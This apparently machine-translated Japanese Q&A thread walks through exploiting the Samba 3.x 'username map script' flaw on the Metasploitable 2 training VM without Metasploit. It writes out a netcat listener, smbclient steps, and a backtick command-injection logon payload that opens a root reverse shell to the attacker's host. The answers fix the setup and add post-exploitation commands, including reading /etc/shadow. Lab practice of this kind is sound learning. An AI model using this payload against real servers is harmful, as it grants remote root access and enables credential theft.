私は学習を目的として、Metasploitを使用せずにMetasploitable 2を活用しようとしています。この場合、私はSamba 3.xに焦点を合わせています(ポートTCP 139、445)
このリンクでは http://www.rwbnetsec.com/samba-3-x/ nmapスキャンが明らかにした後にこのマシンを悪用する2つの異なる方法が説明されていますTCP= Sambaバージョン3.xを実行しているポート139および445が開いている。
2番目の方法は、
この脆弱性は、Sambaの「ユーザー名マップスクリプト」機能を利用します。ユーザー入力のフィルタリングは行われないため、攻撃者はSMBセッションに接続し、シェルメタキャラクターをユーザー名の入力として使用して、リモートシステムでコマンドを実行させる可能性があります。これにより、攻撃者がrootアクセス権を持つ犠牲マシンにリモートシェルを取得することを許可します。
Metasploitを使用すると私の問題が発生します。
私はついにこのビデオを見つけました https://www.youtube.com/watch?v=-Y8-fZAvq9c これはMetasploitを回避しますが、私にとっては機能しません(Kali = 192.168。 200.1; Metasploitable2 = 192.168.200.130):
ターミナルウィンドウ1で、netcatが待機するように設定します。
netcat -nlvp 4444
ターミナルウィンドウ2で、共有を確認します
smbclient -L //192.168.200.130
Tmpフォルダーに注目し、接続します(ターミナル2)。
smbclient //192.168.200.130/tmp
最後に、「smb:>」を取得します。「logon」コマンドを使用して、Kaliにリバース接続します。
smb:>ログオン "/ = nc 192.168.200.1 4444 -e /bin/bash
"
この最後のポイントは、「セッションのセットアップに失敗しました:NT_STATUS_NO_MEMORY」というエラーメッセージが表示されて機能しません。
「ログオン」コマンドを説明する良いマニュアルを見つけるのは難しいです。 netcatの使用方法を変更してみました。
ポイント1で、私は書きます
smb: \> nc -nlvp 4444 -e /bin/bash
ポイント4で、私は書きます
smb: \> logon "/=`nc 192.168.200.1 4444 -e /bin/bash`"
同じ結果。同じメッセージエラー。
本当に一人でやろうとしたけどできなかった。あなたが私を助けてくれるなら、私はとても感謝しています。
前もって感謝します!!
リスナーをsmb(脆弱なボックス)に設定しているようです。
smb: \> nc -nlvp 4444 -e /bin/bash
あなたがしなければならないことは、攻撃ボックスにリスナーを設定することです。代わりに次のコマンドを使用します。
nc -nlvp 4444
最後にmetasploitable2から次のコマンドを発行します。
logon "/=`nc 'attack box ip' 4444 -e /bin/bash`"
同じ問題を抱えていた人のために、以前の回答とこのリンク Metasploitable 2-Samba に従って、私がどのように解決したかを回答します。
実行する手順は次のとおりです。
ターミナルウィンドウ1を開き、netcatが待機するように設定します。
netcat -nlvp 4444
ターミナルウィンドウ2を開き、被害者の共有を確認します。
smbclient -L //192.168.200.130
(ターミナル2)tmp
フォルダーに注目し、被害者に接続します。
smbclient //192.168.200.130/tmp
(ターミナル2)最後に、smb: >
ここで、コマンドlogon
は、Kaliへの逆接続に使用されます。
smb:\> logon "/ =` nc 192.168.200.1 4444 -e/bin/bash` "
注意:バックティックを忘れないでください。
(ターミナル1)確立された接続を確認し、目的のコマンドを挿入できます。例:
id
hostname
uname -a
cat /etc/shadow
パスワードが要求されたら、Enterをクリックします(空のままにします)。